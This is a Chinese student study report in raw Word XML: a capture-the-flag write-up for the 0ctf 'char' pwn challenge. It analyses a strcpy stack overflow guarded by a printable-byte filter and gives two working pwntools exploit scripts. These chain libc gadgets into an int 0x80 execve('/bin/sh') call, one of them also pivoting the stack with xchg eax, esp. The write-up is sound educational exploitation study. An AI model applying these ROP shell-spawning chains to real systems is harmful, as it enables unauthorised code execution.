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WriteupTo0ctf-char</w:t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肖临风</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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指导老师：乐德广</w:t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2019.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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概述：参加了很多CTF比赛，发现ROP还是非常常见并且最需要熟练掌握的技术，所以做了一下之前的经典例题。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关键词：中断调用、ROP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环境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0ctf的char题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将libc.so放入/home/char中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目录：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0x00 逆向分析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0x01 ROP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0x02 拓展思路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0x00 逆向分析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主函数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scanf不存在栈溢出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pict>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:265.95pt;width:289.7pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId6" cropleft="14839f" croptop="10020f" cropright="24282f" cropbottom="10750f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return sub_8048678函数中的strcpy使得dest数组超界，导致栈溢出。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因为存在write函数，一开始的思路是ROP泄露libc地址（版本已知）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pict>
          <v:shape id="_x0000_i1026" o:spt="75" type="#_x0000_t75" style="height:87.5pt;width:245.2pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId7" cropleft="14491f" croptop="10530f" cropright="39453f" cropbottom="47369f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Padding=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"A"*32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+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"BBBB"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程序成功跳转到了0x42424242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理论上已经直接可以ROP了，写了下面的代码，可以泄露libc地址。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当观察源代码，发现程序已经将libc映射到了内存0x5555E000中，我们可以无需泄露地址就能调用函数。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不过事情哪有这么简单呢。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pict>
          <v:shape id="_x0000_i1027" o:spt="75" type="#_x0000_t75" style="height:56.4pt;width:373.1pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId6" cropleft="15154f" croptop="31886f" cropright="24081f" cropbottom="26311f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from pwn import *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#context.log_level='Debug'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p=process('./char')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gdb.attach(p,'b *0x08048692')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libc=ELF('libc.so')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elf=ELF('char')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main_addr=0x08048693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write_plt=elf.plt['write']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print 'write_plt='+hex(write_plt)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write_got=elf.got['write']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print 'write_got='+hex(write_got)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p.recvuntil('GO : ) \n')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payload="A"*32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#payload+="BBBB"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payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)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p.sendline(payload)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p.interactive()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pict>
          <v:shape id="_x0000_i1028" o:spt="75" type="#_x0000_t75" style="height:69.6pt;width:213.45pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId8" cropleft="-63f" croptop="34591f" cropright="31916f" cropbottom="12623f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但是程序没有跳转到write，因为main函数中的检查机制check。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每个字节必须在31到126的范围内。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pict>
          <v:shape id="_x0000_i1029" o:spt="75" type="#_x0000_t75" style="height:98.45pt;width:267.45pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId9" cropleft="15171f" croptop="39179f" cropright="29773f" cropbottom="12369f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pict>
          <v:shape id="_x0000_i1030" o:spt="75" type="#_x0000_t75" style="height:51.1pt;width:227.6pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId10" cropleft="14507f" croptop="10356f" cropright="37896f" cropbottom="49739f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不过看到strlen函数，#将\x00视为字符串结尾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马上我就想到了这次华东北赛区的EMachine这题。我们用/x00截断了程序check机制对我们ROP链的修改。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不过坑爹的是我们造成栈溢出的strcpy函数也是依据\x00来作为截断符的。所以我们如果截断了check机制，同样我们也会截断我们的ROP链。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因为几个函数的调用，都没过审。。。简单来说基本上就是把调用函数的这条路封死了。貌似只有一小部分的gadget能过审。#感谢映射了libc到程序中，我们有更多的gadget可以用。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举个栗子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首先在libc中找到gadget，取得偏移量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$ ROPgadget --binary libc.so --only "pop|ret"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0x0001706b : pop eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret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在exp.pyh中将偏移地址与映射的基址相加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#部分代码#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base=0x5555E000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pop_eax=0x0001706b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p.recvuntil('GO : ) \n')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payload="A"*32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payload+=p32(pop_eax+base)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运行发现成功过审。#组合出来，每一位都在31~126之间#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pict>
          <v:shape id="_x0000_i1031" o:spt="75" type="#_x0000_t75" style="height:133.55pt;width:414.4pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId11" cropleft="142f" cropbottom="30379f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这样出题人的思路就很明确了，还是构造ROP，只是让我们用int 0x80直接呼叫中断，来调用函数。#出题人也不容易啊，为了让我们学到这个知识点，估计掉了不少头发。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官方的writeup是通过调用大量的过审的gadget，最后int 0x80中断呼出execve函数来弹出shell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但是从网上看大神的写的各种writeup，发现有些大神有更巧妙的办法将这个机制绕过，使用一些本来过不了审的gadget。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0x01 ROP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首先，来使用int0x80的方法。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构造ROP链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-&gt;思路：中断调用execve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eax=0xb ebx=/bin/sh的地址 ecx=0 edx=0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因为libc已经被映射在了固定的位置，所以/bin/sh的地址是固定的。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gdb-peda$ find /bin/sh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libc.so : 0x556bb7ec (das)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但是0xec这一部分是不过审的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所以先写入一个领近的数据，然后再通过加减寄存器来修改值。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因为考试周比较忙，所以这一个脚本就写了我两三天，主要寻找能用的gadget实在太艰难了。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实际上原理也不难，就是比较麻烦。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exp脚本如下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from pwn import *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#context.log_level='Debug'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p=process('./char')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gdb.attach(p,'b *0x08048692')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libc=ELF('libc.so')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elf=ELF('char')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base=0x5555E000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pop_eax=0x0001706b #0x0001706b : pop eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret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xchg_esp_eax=0x00019548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mov_eax_ecx=0x000f7b03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 xml:space="preserve">sub_ecx_edx=0xf7b4c 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xor_eax_eax=0x00095555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xor_eax_eax_2=xor_eax_eax+0x1 #delete pop edx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pop_ecx=0x00174a4f+0x2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sub_ecx_eax=0x000f7aff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pop_ebx=0x000e5028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inc_eax=0x00168864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add_ah_al=0x00174860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add_bh_ah=0x000d6e43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add_bl_al=0x0009843f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xor_edx_edx=0x000e8367 #0x00082d35 #xor edx, edx ; pop ebx ; mov eax, edx ; pop esi ; pop edi ; pop ebp ; ret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int_80=0x00109177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p.recvuntil('GO : ) \n')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payload="A"*32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#ecx=0 edx=0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payload+=p32(xor_eax_eax+base) #pop edx; xor eax, eax ; pop edi ; ret   --&gt;eax=0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payload+=p32(0x41414141)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payload+=p32(0x41414141)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payload+=p32(pop_ecx+base) # pop ecx ; add al, 0xa ; ret --&gt; ecx=0x41414141 eax=0xa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payload+=p32(0x41414141)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payload+=p32(sub_ecx_edx+base) #sub ecx, edx ; add esp, 0x4c ; mov eax, ecx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret --&gt; ecx=0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payload+="B"*0x4c #  &lt;--add esp, 0x4c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payload+=p32(0x41414141)*4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payload+=p32(xor_edx_edx+base) #xor edx, edx ; pop ebx ; mov eax, edx ; pop esi ; pop edi ; pop ebp ; ret --&gt;eax=0 edx=0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payload+=p32(0x41414141)*4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#ebx--&gt;/bin/sh 0x556bb7ec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#0x556bb7ec=0x556b477c+0x7070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payload+=p32(pop_ebx+base)# xor eax, eax ; pop ebx ; ret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payload+=p32(0x556b477c)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payload+=p32(inc_eax+base)*0x70 #*0x70 # inc eax ; ret 0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 xml:space="preserve">payload+=p32(add_ah_al+base) #add ah, al ; ret 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payload+=p32(add_bh_ah+base) #add ah, al ; ret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payload+=p32(add_bl_al+base) #add bl, al ; xor eax, eax ; ret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 xml:space="preserve">#eax=0xb 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payload+=p32(xor_eax_eax_2+base)# xor eax, eax ; pop edi ; ret   --&gt;eax=0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payload+=p32(inc_eax+base)*0xc #*eax=0xb # inc eax ; ret 0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payload+=p32(int_80+base) # int 0x80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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑" w:cs="Consolas"/>
          <w:color w:val="4472C4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p.interactive()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pict>
          <v:shape id="_x0000_i1032" o:spt="75" type="#_x0000_t75" style="height:156.65pt;width:166.95pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId12" cropleft="38710f" croptop="31171f" cropright="17241f" cropbottom="17766f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EAX=0xb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EBX-&gt;/bin/sh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ECX=EDX=0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成功CALL EXECVE打开一个shell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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1033" o:spt="75" type="#_x0000_t75" style="height:37.3pt;width:289.55pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId13" cropleft="38576f" croptop="44576f" cropright="11686f" cropbottom="17328f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$ uname -a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Linux migraine 4.13.0-41-generic #46~16.04.1-Ubuntu SMP Thu May 3 10:06:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux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一些笔记：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1.ret x 即在EIP跳转之后esp = esp+4+x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2.计算gadget的确切地址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例如我们writeup中找到的gadget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0x00174a4f : add eax, dword ptr [ebx] ; pop ecx ; add al, 0xa ; ret 我们只需要pop ecx之后的gadget，如何计算从pop ecx开始的确切地址呢。Gdb调试是一个方案，但是这道题情况特殊，只能计算。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在pwntools中，使用asm将前面的指令转化为16进制码，就能计算出长度。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&gt;&gt;&gt; asm('add eax, dword ptr [ebx]')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'\x03\x03' #占用2个字节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所以pop_ecx=0x00174a4f+0x2 #加上base地址正好能够过审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#可以通过 ROPgadget --binary libc.so &gt;gadget将gadget输入文件，方便查找（cat gadget |grep **）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终于补上了自己的知识盲区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ROP实现 int 0x80呼叫中断，和shellcode的原理相同。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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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0x02 拓展思路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扩展思路：栈控制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观察栈，0xff87b4f4栈地址（高亮）存放的是src数组。#也就是主函数中的s数组。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地址0xff87b45c的地址存放的是dest数组。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两者虽然理论上是相同的，但是因为进入内存使用的函数不同，也会导致差异。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Dest数组会受到strcpy的截断(\x00)，但是src因为是scanf（通过回车或者空格截断）输入，所以不会被\x00截断。所以src数组一般来说才是完整的，而dest数组非常容易被截断。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我们知道dest数组才是造成栈溢出的原因，使用strcpy函数导致ROP链接非常容易被截断。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但是通过查看大佬的博客，通过够控制esp，指向src内的ROP链。这样gadget就没有限制了。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然后就可以自由选择ROP了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pict>
          <v:shape id="_x0000_i1034" o:spt="75" type="#_x0000_t75" style="height:155.2pt;width:416.8pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId14" cropleft="-237f" croptop="24680f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pict>
          <v:shape id="_x0000_i1035" o:spt="75" type="#_x0000_t75" style="height:87.5pt;width:245.2pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId7" cropleft="14491f" croptop="10530f" cropright="39453f" cropbottom="47369f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根据调试过程中发现，ecx寄存器总是指向src数组偏移28位的地址。所以可以通过ecx给esp赋值，让程序跳转到src的ROP链上。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寻找Gadget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$ ROPgadget --binary libc.so |grep "xchg eax, esp"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Xchg是一个关键的指令，可以交换eax和esp的值，就可以直接控制栈顶的位置。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下面是exp脚本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from pwn import *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p=process('./char')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gdb.attach(p,'b *0x08048692')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context.log_level='Debug'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libc=ELF('libc.so')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elf=ELF('char')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base=0x5555e000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mov_eax_ecx=0x00148527 #mov eax, ecx ; ret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xchg_eax_esp=0x000e6d62 #xchg eax, esp ; ret 0xb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add_esp=0x00055670 # xor eax, eax ; add esp, 0xc ; ret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xor_edx_edx=0x000da780 #xor edx, edx ; pop ebx ; mov eax, edx ; pop esi ; pop edi ; pop ebp ; ret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inc_eax=0x00026a9b #inc eax ; ret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mov_ecx_edx=0x0007e2d0 #mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; ret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pop_ebx=0x0012edd1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int_80=0x000b84c6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#payload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payload="A"*(32-4)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payload+=p32(add_esp+base)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payload+=p32(mov_eax_ecx+base)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payload+=p32(xchg_eax_esp+base) #warning ret 0xb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payload+="\x00"*3 #cut strcpy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payload+="A"*12 # &lt;--add esp, 0xc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#esp+0x1c--&gt;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#edx=0 eax=0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payload+=p32(xor_edx_edx+base)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payload+=p32(0x41414141)*4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payload+=p32(inc_eax+base)*0xb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#ecx=0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payload+=p32(mov_ecx_edx+base)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payload+=p32(0x41414141) #pop--&gt;edi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#ebx--&gt;/bin/sh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payload+=p32(pop_ebx+base)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payload+=p32(0x556bb7ec) #--&gt;/bin/sh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#int 0x80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payload+=p32(int_80+base)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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>p.interactive()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参考文献：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instrText xml:space="preserve"> HYPERLINK "http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/" </w:instrTex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18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://blog.dazzlepppp.cn/2017/03/24/0ctf-2017-writeup/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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/qq_43449190/article/details/89290052" </w:instrTex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18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/qq_43449190/article/details/89290052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end"/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汉仪旗黑KW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Consolas">
    <w:altName w:val="苹方-简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w:pict>
        <v:shape id="文本框 12" o:spid="_x0000_s2049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WAAAAZHJzL1BLAQIUABQAAAAIAIdO4kCzSVju&#10;0AAAAAUBAAAPAAAAAAAAAAEAIAAAADgAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJA&#10;SJO9kRMCAAAVBAAADgAAAAAAAAABACAAAAA1AQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZ&#10;AQAAugUAAAAA&#10;">
          <v:path/>
          <v:fill on="f" focussize="0,0"/>
          <v:stroke on="f" weight="0.5pt"/>
          <v:imagedata o:title=""/>
          <o:lock v:ext="edit" aspectratio="f"/>
          <v:textbox inset="0mm,0mm,0mm,0mm" style="mso-fit-shape-to-text:t;">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:pStyle w:val="2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t xml:space="preserve">第 </w:t>
                </w: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  <w:r>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia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9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  <w:r>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia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>常熟理工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>下一代互联网技术实验室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>学习报告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9881DA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="949881DA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008C0E6A"/>
    <w:rsid w:val="00E01D28"/>
    <w:rsid w:val="03274847"/>
    <w:rsid w:val="05E64AD7"/>
    <w:rsid w:val="0A197416"/>
    <w:rsid w:val="0BF3774F"/>
    <w:rsid w:val="154000D8"/>
    <w:rsid w:val="19896707"/>
    <w:rsid w:val="1D772200"/>
    <w:rsid w:val="247935B4"/>
    <w:rsid w:val="263A0A4E"/>
    <w:rsid w:val="26F50D1B"/>
    <w:rsid w:val="276067FA"/>
    <w:rsid w:val="2F6632C6"/>
    <w:rsid w:val="2F9A7025"/>
    <w:rsid w:val="315138B5"/>
    <w:rsid w:val="31570C03"/>
    <w:rsid w:val="35C343BA"/>
    <w:rsid w:val="35FB6F97"/>
    <w:rsid w:val="36BC2C07"/>
    <w:rsid w:val="37CB650E"/>
    <w:rsid w:val="3C4A533F"/>
    <w:rsid w:val="3C7B05AC"/>
    <w:rsid w:val="40BB3A1A"/>
    <w:rsid w:val="417272A2"/>
    <w:rsid w:val="421D7C51"/>
    <w:rsid w:val="453A31F8"/>
    <w:rsid w:val="4AD16904"/>
    <w:rsid w:val="511F7E0B"/>
    <w:rsid w:val="52E11D3B"/>
    <w:rsid w:val="53F76FF6"/>
    <w:rsid w:val="578718B5"/>
    <w:rsid w:val="5A337761"/>
    <w:rsid w:val="5DBA5ADD"/>
    <w:rsid w:val="5E264AE8"/>
    <w:rsid w:val="5FEF09F2"/>
    <w:rsid w:val="66D94FB2"/>
    <w:rsid w:val="69CD7F37"/>
    <w:rsid w:val="6AA81F63"/>
    <w:rsid w:val="6C401E96"/>
    <w:rsid w:val="72D6782A"/>
    <w:rsid w:val="7638419E"/>
    <w:rsid w:val="7648664C"/>
    <w:rsid w:val="794F58C7"/>
    <w:rsid w:val="7AA53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Office_1.5.2.2273_F1E327BC-269C-435d-A152-05C5408002CA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2014-10-29T20:08:00Z</dcterms:created>
  <dc:creator>肖临风</dc:creator>
  <cp:lastModifiedBy>p0kerface</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-10T19:56:25Z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2052-1.5.2.2273</vt:lpwstr>
  </property>
</Properties>
</file>